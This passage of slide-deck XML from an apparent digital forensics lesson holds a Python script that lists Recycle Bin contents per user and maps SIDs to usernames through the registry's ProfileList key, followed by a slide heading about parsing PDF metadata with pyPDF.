                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>It is worth noting that files that have been permanently deleted from the Recycle Bin are not recoverable. Also, It is important to keep in mind that accessing the Windows Registry is a delicate task, and if not done correctly it can cause a system malfunction.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="969" name="Google Shape;969;p31"/>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g2073b6da4c1_0_5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500"/>
              <a:t>Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="975" name="Google Shape;975;g2073b6da4c1_0_51"/>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
        <p:nvSpPr>
          <p:cNvPr id="976" name="Google Shape;976;g2073b6da4c1_0_51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608975" y="2161225"/>
            <a:ext cx="11041800" cy="4447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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import</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os</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E5C07B"/>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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>from</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winreg</a:t>
            </a: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import</a:t>
            </a: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OpenKey</a:t>
            </a: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QueryValueEx</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HKEY_LOCAL_MACHINE</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600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a: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sid_to_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sid</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try</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key</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OpenKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE</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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList"</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="98C379"/>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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sid</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value</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_type</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QueryValueEx</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key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'ProfileImagePath'</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user</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value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>split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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1</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return</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user</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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except</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Exception</a:t>
            </a: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as</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e</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:&gt;3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>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 Exception: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>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e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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g2073b6da4c1_0_6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500"/>
              <a:t>Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="982" name="Google Shape;982;g2073b6da4c1_0_65"/>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
        <p:nvSpPr>
          <p:cNvPr id="983" name="Google Shape;983;g2073b6da4c1_0_65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608975" y="2039675"/>
            <a:ext cx="11041800" cy="4720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US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a: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return_dir</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dirs</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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'C:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>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Recycler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'C:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>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Recycled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'C:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>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$Recycle.Bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>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for</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recycle_dir</a:t>
            </a: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in</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dirs</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if</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os</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path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>isdir</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recycle_dir</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return</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recycle_dir</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>None</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a: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find_recycled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>recycle_dir</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dir_list</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os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>listdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>recycle_dir</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for</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sid</a:t>
            </a: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in</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dir_list</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files</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os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>listdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>recycle_dir</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sid</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user</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sid_to_user</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sid</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] Listing Files For User: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>str</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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>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for</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file</a:t>
            </a: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in</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files</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'[+] Found File: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>str</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file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>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a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1600">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g2073b6da4c1_0_7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500"/>
              <a:t>Contd..</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="989" name="Google Shape;989;g2073b6da4c1_0_72"/>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
        <p:nvSpPr>
          <p:cNvPr id="990" name="Google Shape;990;g2073b6da4c1_0_72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608975" y="2039675"/>
            <a:ext cx="11041800" cy="4720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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>for</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file</a:t>
            </a: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in</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files</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'[+] Found File: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>str</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file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>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a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="C678DD"/>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i="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if</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__name__</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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'__main__'</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recycled_dir</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return_dir</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find_recycled</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recycled_dir</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3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a:t>Usage of pyPDF to parse PDF Metadata</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
